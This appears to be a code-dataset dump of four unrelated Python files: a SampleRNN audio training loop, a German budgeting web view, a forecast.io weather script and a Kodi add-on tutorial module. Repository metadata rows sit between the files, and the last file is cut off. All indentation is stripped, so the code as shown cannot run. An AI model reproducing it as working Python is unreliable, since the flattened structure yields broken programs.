# out = T.nnet.relu(out) # commented out to be similar to two_tier
out = lib.ops.Linear('SampleLevel.L2',
DIM,
DIM,
out,
initialization='he',
weightnorm=WEIGHT_NORM)
out = T.nnet.relu(out)
# L3
out = lib.ops.Linear('SampleLevel.L3',
DIM,
DIM,
out,
initialization='he',
weightnorm=WEIGHT_NORM)
out = T.nnet.relu(out)
# Output
# We apply the softmax later
out = lib.ops.Linear('SampleLevel.Output',
DIM,
Q_LEVELS,
out,
weightnorm=WEIGHT_NORM)
return out
sequences = T.imatrix('sequences')
h0 = T.tensor3('h0')
big_h0 = T.tensor3('big_h0')
reset = T.iscalar('reset')
mask = T.matrix('mask')
if args.debug:
# Solely for debugging purposes.
# Maybe I should set the compute_test_value=warn from here.
sequences.tag.test_value = numpy.zeros((BATCH_SIZE, SEQ_LEN+OVERLAP), dtype='int32')
h0.tag.test_value = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*DIM), dtype='float32')
big_h0.tag.test_value = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*BIG_DIM), dtype='float32')
reset.tag.test_value = numpy.array(1, dtype='int32')
mask.tag.test_value = numpy.ones((BATCH_SIZE, SEQ_LEN+OVERLAP), dtype='float32')
big_input_sequences = sequences[:, :-BIG_FRAME_SIZE]
input_sequences = sequences[:, BIG_FRAME_SIZE-FRAME_SIZE:-FRAME_SIZE]
target_sequences = sequences[:, BIG_FRAME_SIZE:]
target_mask = mask[:, BIG_FRAME_SIZE:]
big_frame_level_outputs, new_big_h0, big_frame_independent_preds = big_frame_level_rnn(big_input_sequences, big_h0, reset)
frame_level_outputs, new_h0 = frame_level_rnn(input_sequences, big_frame_level_outputs, h0, reset)
prev_samples = sequences[:, BIG_FRAME_SIZE-FRAME_SIZE:-1]
prev_samples = prev_samples.reshape((1, BATCH_SIZE, 1, -1))
prev_samples = T.nnet.neighbours.images2neibs(prev_samples, (1, FRAME_SIZE), neib_step=(1, 1), mode='valid')
prev_samples = prev_samples.reshape((BATCH_SIZE * SEQ_LEN, FRAME_SIZE))
sample_level_outputs = sample_level_predictor(
frame_level_outputs.reshape((BATCH_SIZE * SEQ_LEN, DIM)),
prev_samples
)
cost = T.nnet.categorical_crossentropy(
T.nnet.softmax(sample_level_outputs),
target_sequences.flatten()
)
cost = cost.reshape(target_sequences.shape)
cost = cost * target_mask
# Don't use these lines; could end up with NaN
# Specially at the end of audio files where mask is
# all zero for some of the shorter files in mini-batch.
#cost = cost.sum(axis=1) / target_mask.sum(axis=1)
#cost = cost.mean(axis=0)
# Use this one instead.
cost = cost.sum()
cost = cost / target_mask.sum()
# By default we report cross-entropy cost in bits.
# Switch to nats by commenting out this line:
# log_2(e) = 1.44269504089
cost = cost * lib.floatX(numpy.log2(numpy.e))
ip_cost = lib.floatX(numpy.log2(numpy.e)) * T.nnet.categorical_crossentropy(
T.nnet.softmax(big_frame_independent_preds.reshape((-1, Q_LEVELS))),
target_sequences.flatten()
)
ip_cost = ip_cost.reshape(target_sequences.shape)
ip_cost = ip_cost * target_mask
ip_cost = ip_cost.sum()
ip_cost = ip_cost / target_mask.sum()
### Getting the params, grads, updates, and Theano functions ###
#params = lib.get_params(cost, lambda x: hasattr(x, 'param') and x.param==True)
#ip_params = lib.get_params(ip_cost, lambda x: hasattr(x, 'param') and x.param==True\
# and 'BigFrameLevel' in x.name)
#other_params = [p for p in params if p not in ip_params]
#params = ip_params + other_params
#lib.print_params_info(params, path=FOLDER_PREFIX)
#
#grads = T.grad(cost, wrt=params, disconnected_inputs='warn')
#grads = [T.clip(g, lib.floatX(-GRAD_CLIP), lib.floatX(GRAD_CLIP)) for g in grads]
#
#updates = lasagne.updates.adam(grads, params, learning_rate=LEARNING_RATE)
###########
all_params = lib.get_params(cost, lambda x: hasattr(x, 'param') and x.param==True)
ip_params = lib.get_params(ip_cost, lambda x: hasattr(x, 'param') and x.param==True\
and 'BigFrameLevel' in x.name)
other_params = [p for p in all_params if p not in ip_params]
all_params = ip_params + other_params
lib.print_params_info(ip_params, path=FOLDER_PREFIX)
lib.print_params_info(other_params, path=FOLDER_PREFIX)
lib.print_params_info(all_params, path=FOLDER_PREFIX)
ip_grads = T.grad(ip_cost, wrt=ip_params, disconnected_inputs='warn')
ip_grads = [T.clip(g, lib.floatX(-GRAD_CLIP), lib.floatX(GRAD_CLIP)) for g in ip_grads]
other_grads = T.grad(cost, wrt=other_params, disconnected_inputs='warn')
other_grads = [T.clip(g, lib.floatX(-GRAD_CLIP), lib.floatX(GRAD_CLIP)) for g in other_grads]
grads = T.grad(cost, wrt=all_params, disconnected_inputs='warn')
grads = [T.clip(g, lib.floatX(-GRAD_CLIP), lib.floatX(GRAD_CLIP)) for g in grads]
ip_updates = lasagne.updates.adam(ip_grads, ip_params)
other_updates = lasagne.updates.adam(other_grads, other_params)
updates = lasagne.updates.adam(grads, all_params)
# Training function(s)
ip_train_fn = theano.function(
[sequences, big_h0, reset, mask],
[ip_cost, new_big_h0],
updates=ip_updates,
on_unused_input='warn'
)
other_train_fn = theano.function(
[sequences, big_h0, h0, reset, mask],
[cost, new_big_h0, new_h0],
updates=other_updates,
on_unused_input='warn'
)
train_fn = theano.function(
[sequences, big_h0, h0, reset, mask],
[cost, new_big_h0, new_h0],
updates=updates,
on_unused_input='warn'
)
# Validation and Test function, hence no updates
ip_test_fn = theano.function(
[sequences, big_h0, reset, mask],
[ip_cost, new_big_h0],
on_unused_input='warn'
)
other_test_fn = theano.function(
[sequences, big_h0, h0, reset, mask],
[cost, new_big_h0, new_h0],
on_unused_input='warn'
)
test_fn = theano.function(
[sequences, big_h0, h0, reset, mask],
[cost, new_big_h0, new_h0],
on_unused_input='warn'
)
# Sampling at big frame level
big_frame_level_generate_fn = theano.function(
[sequences, big_h0, reset],
big_frame_level_rnn(sequences, big_h0, reset)[0:2],
on_unused_input='warn'
)
# Sampling at frame level
big_frame_level_outputs = T.matrix('big_frame_level_outputs')
frame_level_generate_fn = theano.function(
[sequences, big_frame_level_outputs, h0, reset],
frame_level_rnn(sequences, big_frame_level_outputs.dimshuffle(0,'x',1), h0, reset),
on_unused_input='warn'
)
# Sampling at audio sample level
frame_level_outputs = T.matrix('frame_level_outputs')
prev_samples = T.imatrix('prev_samples')
sample_level_generate_fn = theano.function(
[frame_level_outputs, prev_samples],
lib.ops.softmax_and_sample(
sample_level_predictor(
frame_level_outputs,
prev_samples
)
),
on_unused_input='warn'
)
# Uniform [-0.5, 0.5) for half of initial state for generated samples
# to study the behaviour of the model and also to introduce some diversity
# to samples in a simple way. [it's disabled]
fixed_rand_h0 = numpy.random.rand(N_SEQS//2, N_RNN, H0_MULT*DIM)
fixed_rand_h0 -= 0.5
fixed_rand_h0 = fixed_rand_h0.astype('float32')
fixed_rand_big_h0 = numpy.random.rand(N_SEQS//2, N_RNN, H0_MULT*DIM)
fixed_rand_big_h0 -= 0.5
fixed_rand_big_h0 = fixed_rand_big_h0.astype('float32')
def generate_and_save_samples(tag):
def write_audio_file(name, data):
data = data.astype('float32')
data -= data.min()
data /= data.max()
data -= 0.5
data *= 0.95
scipy.io.wavfile.write(
os.path.join(SAMPLES_PATH, name+'.wav'),
BITRATE,
data)
total_time = time()
# Generate N_SEQS' sample files, each 5 seconds long
N_SECS = 5
LENGTH = N_SECS*BITRATE if not args.debug else 100
samples = numpy.zeros((N_SEQS, LENGTH), dtype='int32')
samples[:, :BIG_FRAME_SIZE] = Q_ZERO
# First half zero, others fixed random at each checkpoint
big_h0 = numpy.zeros(
(N_SEQS-fixed_rand_big_h0.shape[0], N_BIG_RNN, H0_MULT*BIG_DIM),
dtype='float32'
)
big_h0 = numpy.concatenate((big_h0, fixed_rand_big_h0), axis=0)
h0 = numpy.zeros(
(N_SEQS-fixed_rand_h0.shape[0], N_RNN, H0_MULT*DIM),
dtype='float32'
)
h0 = numpy.concatenate((h0, fixed_rand_h0), axis=0)
big_frame_level_outputs = None
frame_level_outputs = None
for t in xrange(BIG_FRAME_SIZE, LENGTH):
if t % BIG_FRAME_SIZE == 0:
big_frame_level_outputs, big_h0 = big_frame_level_generate_fn(
samples[:, t-BIG_FRAME_SIZE:t],
big_h0,
numpy.int32(t == BIG_FRAME_SIZE)
)
if t % FRAME_SIZE == 0:
frame_level_outputs, h0 = frame_level_generate_fn(
samples[:, t-FRAME_SIZE:t],
big_frame_level_outputs[:, (t / FRAME_SIZE) % (BIG_FRAME_SIZE / FRAME_SIZE)],
h0,
numpy.int32(t == BIG_FRAME_SIZE)
)
samples[:, t] = sample_level_generate_fn(
frame_level_outputs[:, t % FRAME_SIZE],
samples[:, t-FRAME_SIZE:t]
)
total_time = time() - total_time
log = "{} samples of {} seconds length generated in {} seconds."
log = log.format(N_SEQS, N_SECS, total_time)
print log,
for i in xrange(N_SEQS):
samp = samples[i]
if Q_TYPE == 'mu-law':
from datasets.dataset import mu2linear
samp = mu2linear(samp)
elif Q_TYPE == 'a-law':
raise NotImplementedError('a-law is not implemented')
write_audio_file("sample_{}_{}".format(tag, i), samp)
def monitor(data_feeder):
"""
Cost and time of test_fn on a given dataset section.
Pass only one of `valid_feeder` or `test_feeder`.
Don't pass `train_feed`.
:returns:
Mean cost over the input dataset (data_feeder)
Total time spent
"""
_total_time = time()
_h0 = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*DIM), dtype='float32')
_big_h0 = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*BIG_DIM), dtype='float32')
_costs = []
_data_feeder = load_data(data_feeder)
for _seqs, _reset, _mask in _data_feeder:
_cost, _big_h0, _h0 = test_fn(_seqs, _big_h0, _h0, _reset, _mask)
_costs.append(_cost)
return numpy.mean(_costs), time() - _total_time
print "Wall clock time spent before training started: {:.2f}h"\
.format((time()-exp_start)/3600.)
print "Training!"
total_iters = 0
total_time = 0.
last_print_time = 0.
last_print_iters = 0
costs = []
lowest_valid_cost = numpy.finfo(numpy.float32).max
corresponding_test_cost = numpy.finfo(numpy.float32).max
new_lowest_cost = False
end_of_batch = False
epoch = 0
h0 = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*DIM), dtype='float32')
big_h0 = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*BIG_DIM), dtype='float32')
# Initial load train dataset
tr_feeder = load_data(train_feeder)
### Handling the resume option:
if RESUME:
# Check if checkpoint from previous run is not corrupted.
# Then overwrite some of the variables above.
iters_to_consume, res_path, epoch, total_iters,\
[lowest_valid_cost, corresponding_test_cost, test_cost] = \
lib.resumable(path=FOLDER_PREFIX,
iter_key=iter_str,
epoch_key=epoch_str,
add_resume_counter=True,
other_keys=[lowest_valid_str,
corresp_test_str,
test_nll_str])
# At this point we saved the pkl file.
last_print_iters = total_iters
print "### RESUMING JOB FROM EPOCH {}, ITER {}".format(epoch, total_iters)
# Consumes this much iters to get to the last point in training data.
consume_time = time()
for i in xrange(iters_to_consume):
tr_feeder.next()
consume_time = time() - consume_time
print "Train data ready in {:.2f}secs after consuming {} minibatches.".\
format(consume_time, iters_to_consume)
lib.load_params(res_path)
print "Parameters from last available checkpoint loaded."
while True:
# THIS IS ONE ITERATION
if total_iters % 500 == 0:
print total_iters,
total_iters += 1
try:
# Take as many mini-batches as possible from train set
mini_batch = tr_feeder.next()
except StopIteration:
# Mini-batches are finished. Load it again.
# Basically, one epoch.
tr_feeder = load_data(train_feeder)
# and start taking new mini-batches again.
mini_batch = tr_feeder.next()
epoch += 1
end_of_batch = True
print "[Another epoch]",
seqs, reset, mask = mini_batch
start_time = time()
cost, big_h0, h0 = train_fn(seqs, big_h0, h0, reset, mask)
total_time += time() - start_time
#print "This cost:", cost, "This h0.mean()", h0.mean()
costs.append(cost)
# Monitoring step
if (TRAIN_MODE=='iters' and total_iters-last_print_iters == PRINT_ITERS) or \
(TRAIN_MODE=='time' and total_time-last_print_time >= PRINT_TIME) or \
(TRAIN_MODE=='time-iters' and total_time-last_print_time >= PRINT_TIME) or \
(TRAIN_MODE=='iters-time' and total_iters-last_print_iters >= PRINT_ITERS) or \
end_of_batch:
# 0. Validation
print "\nValidation!",
valid_cost, valid_time = monitor(valid_feeder)
print "Done!"
# 1. Test
test_time = 0.
# Only when the validation cost is improved get the cost for test set.
if valid_cost < lowest_valid_cost:
lowest_valid_cost = valid_cost
print "\n>>> Best validation cost of {} reached. Testing!"\
.format(valid_cost),
test_cost, test_time = monitor(test_feeder)
print "Done!"
# Report last one which is the lowest on validation set:
print ">>> test cost:{}\ttotal time:{}".format(test_cost, test_time)
corresponding_test_cost = test_cost
new_lowest_cost = True
# 2. Stdout the training progress
print_info = "epoch:{}\ttotal iters:{}\twall clock time:{:.2f}h\n"
print_info += ">>> Lowest valid cost:{}\t Corresponding test cost:{}\n"
print_info += "\ttrain cost:{:.4f}\ttotal time:{:.2f}h\tper iter:{:.3f}s\n"
print_info += "\tvalid cost:{:.4f}\ttotal time:{:.2f}h\n"
print_info += "\ttest cost:{:.4f}\ttotal time:{:.2f}h"
print_info = print_info.format(epoch,
total_iters,
(time()-exp_start)/3600,
lowest_valid_cost,
corresponding_test_cost,
numpy.mean(costs),
total_time/3600,
total_time/total_iters,
valid_cost,
valid_time/3600,
test_cost,
test_time/3600)
print print_info
tag = "e{}_i{}_t{:.2f}_tr{:.4f}_v{:.4f}"
tag = tag.format(epoch,
total_iters,
total_time/3600,
numpy.mean(cost),
valid_cost)
tag += ("_best" if new_lowest_cost else "")
# 3. Save params of model (IO bound, time consuming)
# If saving params is not successful, there shouldn't be any trace of
# successful monitoring step in train_log as well.
print "Saving params!",
lib.save_params(
os.path.join(PARAMS_PATH, 'params_{}.pkl'.format(tag))
)
print "Done!"
# 4. Save and graph training progress (fast)
training_info = {epoch_str : epoch,
iter_str : total_iters,
train_nll_str : numpy.mean(costs),
valid_nll_str : valid_cost,
test_nll_str : test_cost,
lowest_valid_str : lowest_valid_cost,
corresp_test_str : corresponding_test_cost,
'train time' : total_time,
'valid time' : valid_time,
'test time' : test_time,
'wall clock time' : time()-exp_start}
lib.save_training_info(training_info, FOLDER_PREFIX)
print "Train info saved!",
y_axis_strs = [train_nll_str, valid_nll_str, test_nll_str]
lib.plot_traing_info(iter_str, y_axis_strs, FOLDER_PREFIX)
print "And plotted!"
# 5. Generate and save samples (time consuming)
# If not successful, we still have the params to sample afterward
print "Sampling!",
# Generate samples
generate_and_save_samples(tag)
print "Done!"
if total_iters-last_print_iters == PRINT_ITERS \
or total_time-last_print_time >= PRINT_TIME:
# If we are here b/c of onom_end_of_batch, we shouldn't mess
# with costs and last_print_iters
costs = []
last_print_time += PRINT_TIME
last_print_iters += PRINT_ITERS
end_of_batch = False
new_lowest_cost = False
print "Validation Done!\nBack to Training..."
if (TRAIN_MODE=='iters' and total_iters == STOP_ITERS) or \
(TRAIN_MODE=='time' and total_time >= STOP_TIME) or \
((TRAIN_MODE=='time-iters' or TRAIN_MODE=='iters-time') and \
(total_iters == STOP_ITERS or total_time >= STOP_TIME)):
print "Done! Total iters:", total_iters, "Total time: ", total_time
print "Experiment ended at:", datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M')
print "Wall clock time spent: {:.2f}h"\
.format((time()-exp_start)/3600)
sys.exit()
|
mit
| -2,786,688,481,508,566,500
| 37.406452
| 148
| 0.59379
| false
| 3.416029
| true
| false
| false
|
RosesTheN00b/BudgetButlerWeb
|
butler_offline/views/einzelbuchungen/uebersicht_monat.py
|
1
|
8451
|
from butler_offline.viewcore.state import persisted_state
from butler_offline.core import time
from butler_offline.viewcore import request_handler
from butler_offline.viewcore import viewcore
from butler_offline.core.report import ReportGenerator
from butler_offline.viewcore.converter import datum_to_string
def _handle_request(request):
context = viewcore.generate_base_context('monatsuebersicht')
einzelbuchungen = persisted_state.database_instance().einzelbuchungen
monate = sorted(einzelbuchungen.get_monate(), reverse=True)
context['monate'] = monate
if not monate:
return viewcore.generate_error_context('monatsuebersicht', 'Keine Ausgaben erfasst')
selected_item = context['monate'][0]
if request.method == "POST":
selected_item = request.values['date']
month = int(float(selected_item.split("_")[1]))
year = int(float(selected_item.split("_")[0]))
table_data_selection = einzelbuchungen.select().select_month(month).select_year(year)
table_ausgaben = table_data_selection.select_ausgaben()
table_einnahmen = table_data_selection.select_einnahmen()
'''
Berechnung der Ausgaben für das Kreisdiagramm
'''
ausgaben_liste = []
ausgaben_labels = []
ausgaben_data = []
ausgaben_colors = []
for kategorie, row in table_ausgaben.group_by_kategorie().iterrows():
ausgaben_labels.append(kategorie)
ausgaben_data.append("%.2f" % abs(row.Wert))
ausgaben_colors.append("#" + einzelbuchungen.get_farbe_fuer(kategorie))
ausgaben_liste.append((kategorie, "%.2f" % row.Wert, einzelbuchungen.get_farbe_fuer(kategorie)))
context['ausgaben'] = ausgaben_liste
context['ausgaben_labels'] = ausgaben_labels
context['ausgaben_data'] = ausgaben_data
context['ausgaben_colors'] = ausgaben_colors
'''
Berechnung der Einnahmen für das Kreisdiagramm
'''
einnahmen_liste = []
einnahmen_labels = []
einnahmen_data = []
einnahmen_colors = []
for kategorie, row in table_einnahmen.group_by_kategorie().iterrows():
einnahmen_labels.append(kategorie)
einnahmen_data.append("%.2f" % abs(row.Wert))
einnahmen_colors.append("#" + einzelbuchungen.get_farbe_fuer(kategorie))
einnahmen_liste.append((kategorie, "%.2f" % row.Wert, einzelbuchungen.get_farbe_fuer(kategorie)))
context['einnahmen'] = einnahmen_liste
context['einnahmen_labels'] = einnahmen_labels
context['einnahmen_data'] = einnahmen_data
context['einnahmen_colors'] = einnahmen_colors
zusammenfassung = table_data_selection.get_month_summary()
for tag, kategorien_liste in zusammenfassung:
for einheit in kategorien_liste:
einheit['farbe'] = einzelbuchungen.get_farbe_fuer(einheit['kategorie'])
context['zusammenfassung'] = zusammenfassung
ausgaben_monat = table_ausgaben.sum()
context['gesamt'] = "%.2f" % ausgaben_monat
einnahmen_monat = table_einnahmen.sum()
context['gesamt_einnahmen'] = "%.2f" % einnahmen_monat
selected_date = str(year) + "_" + str(month).rjust(2, "0")
context['selected_date'] = selected_date
context['selected_year'] = year
if einnahmen_monat >= abs(ausgaben_monat):
context['color_uebersicht_gruppe_1'] = "gray"
context['name_uebersicht_gruppe_1'] = 'Gedeckte Ausgaben'
context['wert_uebersicht_gruppe_1'] = '%.2f' % abs(ausgaben_monat)
context['color_uebersicht_gruppe_2'] = "lightgreen"
context['name_uebersicht_gruppe_2'] = 'Einnahmenüberschuss'
context['wert_uebersicht_gruppe_2'] = '%.2f' % (einnahmen_monat + ausgaben_monat)
else:
context['color_uebersicht_gruppe_1'] = "gray"
context['name_uebersicht_gruppe_1'] = 'Gedeckte Ausgaben'
context['wert_uebersicht_gruppe_1'] = '%.2f' % einnahmen_monat
context['color_uebersicht_gruppe_2'] = "red"
context['name_uebersicht_gruppe_2'] = 'Ungedeckte Ausgaben'
context['wert_uebersicht_gruppe_2'] = '%.2f' % ((ausgaben_monat + einnahmen_monat) * -1)
einnahmen_jahr = einzelbuchungen.select().select_einnahmen().select_year(year).sum()
ausgaben_jahr = einzelbuchungen.select().select_ausgaben().select_year(year).sum()
if einnahmen_jahr >= abs(ausgaben_jahr):
context['color_uebersicht_jahr_gruppe_1'] = "gray"
context['name_uebersicht_jahr_gruppe_1'] = 'Gedeckte Einnahmen'
context['wert_uebersicht_jahr_gruppe_1'] = '%.2f' % abs(ausgaben_jahr)
context['color_uebersicht_jahr_gruppe_2'] = "lightgreen"
context['name_uebersicht_jahr_gruppe_2'] = 'Einnahmenüberschuss'
context['wert_uebersicht_jahr_gruppe_2'] = '%.2f' % (einnahmen_jahr + ausgaben_jahr)
else:
context['color_uebersicht_jahr_gruppe_1'] = "gray"
context['name_uebersicht_jahr_gruppe_1'] = 'Gedeckte Ausgaben'
context['wert_uebersicht_jahr_gruppe_1'] = '%.2f' % einnahmen_jahr
context['color_uebersicht_jahr_gruppe_2'] = "red"
context['name_uebersicht_jahr_gruppe_2'] = 'Ungedeckte Ausgaben'
context['wert_uebersicht_jahr_gruppe_2'] = '%.2f' % ((ausgaben_jahr + einnahmen_jahr) * -1)
return context
def index(request):
return request_handler.handle_request(request, _handle_request, 'einzelbuchungen/uebersicht_monat.html')
def _abrechnen(request):
context = viewcore.generate_base_context('monatsuebersicht')
date = time.today()
year = date.year
month = date.month
quantity = 60
if request.method == 'POST':
if 'date' in request.values:
str_year, str_month = request.values['date'].split('_')
year = int(str_year)
month = int(str_month)
if 'quantity' in request.values:
quantity = int(request.values['quantity'])
einzelbuchungen = persisted_state.database_instance().einzelbuchungen
generator = ReportGenerator('Monatsübersicht für ' + str(month) + '/' + str(year), quantity)
table_data_selection = einzelbuchungen.select().select_month(month).select_year(year)
table_ausgaben = table_data_selection.select_ausgaben()
table_einnahmen = table_data_selection.select_einnahmen()
if _is_selected(request, 'zusammenfassung_einnahmen'):
data = {}
for kategorie, row in table_einnahmen.group_by_kategorie().iterrows():
data[kategorie] = row.Wert
generator.add_half_line_elements({'Einnahmen': data})
if _is_selected(request, 'zusammenfassung_ausgaben'):
data = {}
for kategorie, row in table_ausgaben.group_by_kategorie().iterrows():
data[kategorie] = row.Wert
generator.add_half_line_elements({'Ausgaben': data})
if _is_selected(request, 'einnahmen'):
generator.add_halfline('')
generator.add_halfline('')
generator.add_halfline('----Einnahmen----')
zusammenfassung = table_einnahmen.zusammenfassung()
compiled_zusammenfassung = {}
for tag, kategorien_liste in zusammenfassung:
compiled_zusammenfassung[datum_to_string(tag)] = {}
for einheit in kategorien_liste:
compiled_zusammenfassung[datum_to_string(tag)][einheit['name']] = float(einheit['summe'])
generator.add_half_line_elements(compiled_zusammenfassung)
if _is_selected(request, 'ausgaben'):
generator.add_halfline('')
generator.add_halfline('')
generator.add_halfline('----Ausgaben----')
zusammenfassung = table_ausgaben.zusammenfassung()
compiled_zusammenfassung = {}
for tag, kategorien_liste in zusammenfassung:
compiled_zusammenfassung[datum_to_string(tag)] = {}
for einheit in kategorien_liste:
compiled_zusammenfassung[datum_to_string(tag)][einheit['name']] = float(einheit['summe'])
generator.add_half_line_elements(compiled_zusammenfassung)
page = ''
for line in generator.generate_pages():
page = page + '<br>' + line
context['abrechnungstext'] = '<pre>' + page + '</pre>'
context['element_titel'] = 'Abrechnung vom {month}/{year}'.format(month=month, year=year)
return context
def _is_selected(request, name):
if request.method != 'POST':
return True
if name in request.values:
return True
return False
def abrechnen(request):
return request_handler.handle_request(request, _abrechnen, 'shared/present_abrechnung.html')
|
agpl-3.0
| -3,474,251,232,784,731,600
| 41.437186
| 108
| 0.665483
| false
| 2.730359
| false
| false
| false
|
schmodd/forecast.py
|
forecast.py
|
1
|
4251
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# todo: add alerts, colors
import requests
import json
import datetime
import argparse
import sys
from prettytable import PrettyTable
# surf to https://developer.forecast.io/ for an api key
# use http://dbsgeo.com/latlon/ to get coordinates for your location
API_KEY=''
LAT=''
LONG=''
LIMIT=24 # limit hourly forecast output (48 max)
#some api settings
UNITS='si' # auto possibly shows wrong measuring unit
LANG='en'
def formatDatetime(unixTime, outputFormat='%d. %b. %H:%M'):
return datetime.datetime.fromtimestamp(unixTime).strftime(outputFormat)
def getMeasuringUnit():
return '\N{DEGREE SIGN}F' if UNITS == 'us' else '\N{DEGREE SIGN}C'
def getPrecip(probability, type):
probability = '{:3.0f} {:1}'.format(probability * 100, '%')
return '{:} {:>5}'.format(probability, '-') if type == 0 else '{:} {:>5}'.format(probability, type)
def showDaily(measuring_unit):
HEAD = ['Date', 'Temp min', 'Temp max', 'HUM', 'SR', 'SS', 'Precip', 'Summary']
table = PrettyTable(HEAD, border = False, padding_width = 2)
table.align='r'
table.align['Date'] = 'l'
table.align['Summary'] = 'l'
for day in result['daily']['data']:
table.add_row([formatDatetime(day['time'], '%d. %b.'), '{:4.2f} {:2}'.format(day['temperatureMin'],
measuring_unit), '{:4.2f} {:2}'.format(day['temperatureMax'], measuring_unit),
'{:3.0f} {:1}'.format(day['humidity'] * 100, '%'), formatDatetime(day['sunriseTime'], '%H:%M'),
formatDatetime(day['sunsetTime'], '%H:%M'), getPrecip(day['precipProbability'],
day['precipType'] if day['precipProbability'] > 0 else 0), day['summary']])
print('\n', end='')
print(table)
def showHourly(measuring_unit):
HEAD = ['Date', 'Temp', 'HUM', 'Precip', 'Summary']
table = PrettyTable(HEAD, border = False, padding_width = 2)
table.align='r'
table.align['Date'] = 'l'
table.align['Summary'] = 'l'
for hour in result['hourly']['data'][0:LIMIT]:
table.add_row([formatDatetime(hour['time'], '%d. %b. %H:%M'), '{:4.2f} {:2}'.format(hour['temperature'],
measuring_unit), '{:3.0f} {:1}'.format(hour['humidity'] * 100, '%'), getPrecip(hour['precipProbability'],
hour['precipType'] if hour['precipProbability'] > 0 else 0), hour['summary']])
print('\n', end='')
print(table)
if __name__ == '__main__':
if not API_KEY or not LAT or not LONG:
sys.exit("aborted! please make sure api-key and coordinates are specified")
parser = argparse.ArgumentParser(description='weather forecast powered by forecast.io')
group = parser.add_mutually_exclusive_group()
group.add_argument('-df', help='daily forecast', action='store_true')
group.add_argument('-hf', help='hourly forecast', action='store_true')
args = parser.parse_args()
BASE_URL = 'https://api.forecast.io/forecast/'
SETTINGS = API_KEY + '/' + LAT + ',' + LONG + '?units=' + UNITS + '&lang='+ LANG + '&exclude=flags,minutely,'
URL = BASE_URL + SETTINGS
HTTP_HEADERS = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0',
'Accept-Encoding': 'gzip'}
MEAS_UNIT = getMeasuringUnit()
if args.df:
URL += 'hourly,currently'
elif args.hf:
URL += 'daily,currently'
else:
URL += 'hourly,daily'
result = requests.get(URL, headers=HTTP_HEADERS)
if result.status_code == 200:
result = result.json()
if args.df:
showDaily(MEAS_UNIT)
elif args.hf:
showHourly(MEAS_UNIT)
else:
print('{:} {:10}'.format('\n date:', formatDatetime(result['currently']['time'])), end='')
print('{:} {:6.2f} {:2}'.format(' | temp:', result['currently']['temperature'], MEAS_UNIT), end='')
print('{:} {:2.0f} {:1}'.format(' | humidity:', result['currently']['humidity'] * 100, '%'), end='')
print('{:} {:}'.format(' | precipitation:', getPrecip(result['currently']['precipProbability'],
result['currently']['precipType'] if result['currently']['precipProbability'] > 0 else 0)))
else:
print('aborted! problems connecting to forecast.io')
|
mit
| -898,684,992,294,098,300
| 40.676471
| 117
| 0.605034
| false
| 3.352524
| false
| false
| false
|
repotvsupertuga/tvsupertuga.repository
|
script.module.python.koding.aio/lib/koding/tutorials.py
|
1
|
7420
|
# -*- coding: utf-8 -*-
# script.module.python.koding.aio
# Python Koding AIO (c) by TOTALREVOLUTION LTD (support@trmc.freshdesk.com)
# Python Koding AIO is licensed under a
# Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License.
# You should have received a copy of the license along with this
# work. If not, see http://creativecommons.org/licenses/by-nc-nd/4.0.
# Please make sure you've read and understood the license, this code can NOT be used commercially
# and it can NOT be modified and redistributed. If you're found to be in breach of this license
# then any affected add-ons will be blacklisted and will not be able to work on the same system
# as any other add-ons which use this code. Thank you for your cooperation.
import os
import re
import sys
import urllib
import xbmc
import xbmcaddon
import xbmcgui
import xbmcplugin
import xbmcvfs
from directory import Add_Dir
from filetools import Text_File
from vartools import Find_In_Text
from guitools import Text_Box, Show_Busy, Keyboard
from systemtools import Sleep_If_Window_Active
from video import Play_Video
from web import Open_URL
dialog = xbmcgui.Dialog()
py_path = 'special://home/addons/script.module.python.koding.aio/lib/koding'
video_base = 'http://totalrevolution.tv/videos/python_koding/'
#----------------------------------------------------------------
def Grab_Tutorials():
""" internal command ~"""
import re
full_array = []
dirs,files = xbmcvfs.listdir(py_path)
# Check all the modules for functions with tutorial info
for file in files:
file_path = os.path.join(py_path,file)
if file.endswith('.py') and file != 'tutorials.py':
content = Text_File(file_path,'r').replace('\r','')
# content_array = re.compile('# TUTORIAL #\ndef (.+?)\(').findall(content)
content_array = Find_In_Text(content=content, start='# TUTORIAL #\ndef ', end='\(', show_errors=False)
if content_array:
for item in content_array:
item = item.strip()
full_array.append('%s~%s'%(item,file_path))
content_array = Find_In_Text(content=content, start='# TUTORIAL #\nclass ', end='\(', show_errors=False)
if content_array:
for item in content_array:
item = item.strip()
full_array.append('%s~%s'%(item,file_path))
# Return a list of tutorials
Add_Dir('[COLOR=gold]CREATE YOUR FIRST ADD-ON[/COLOR]',video_base+'Create_Addon.mov','play_video', folder=False, icon='', fanart='', description='How to create your own add-on using the Python Koding framework.')
for item in sorted(full_array,key=str.lower):
name, filepath = item.split('~')
filepath = urllib.quote(filepath)
Add_Dir(name=name.upper().replace('_',' '), url='%s~%s'%(name,filepath), mode='show_tutorial', folder=False, icon='', fanart='', description='Instructions for how to use the %s function.'%name)
#----------------------------------------------------------------
def Show_Tutorial(url):
""" internal command ~"""
name, filepath = url.split('~')
filepath = urllib.unquote(filepath)
readfile = Text_File(filepath,'r').replace('\r','')
try:
raw_find = Find_In_Text(content=readfile, start='# TUTORIAL #\ndef %s' % name,end='~"""')[0]
except:
raw_find = Find_In_Text(content=readfile, start='# TUTORIAL #\nclass %s' % name,end='~"""')[0]
# Check if an example code segment exists in the comments
if 'EXAMPLE CODE:' in raw_find:
code = re.findall(r'(?<=EXAMPLE CODE:)(?s)(.*$)', raw_find)[0]
code = code.replace('script.module.python.koding.aio','temp_replace_string')
code = code.replace('koding.','').strip()
code = code.replace('temp_replace_string','script.module.python.koding.aio')
else:
code = None
# Check if a video exists in the comments
internetstate = xbmc.getInfoLabel('System.InternetState')
if internetstate:
video_page = Open_URL(video_base)
extension = Find_In_Text(video_page, name, '"', False)
if extension != '' and extension != None:
video = video_base+name+extension[0]
else:
video = None
else:
video = None
counter = 0
removal_string = ''
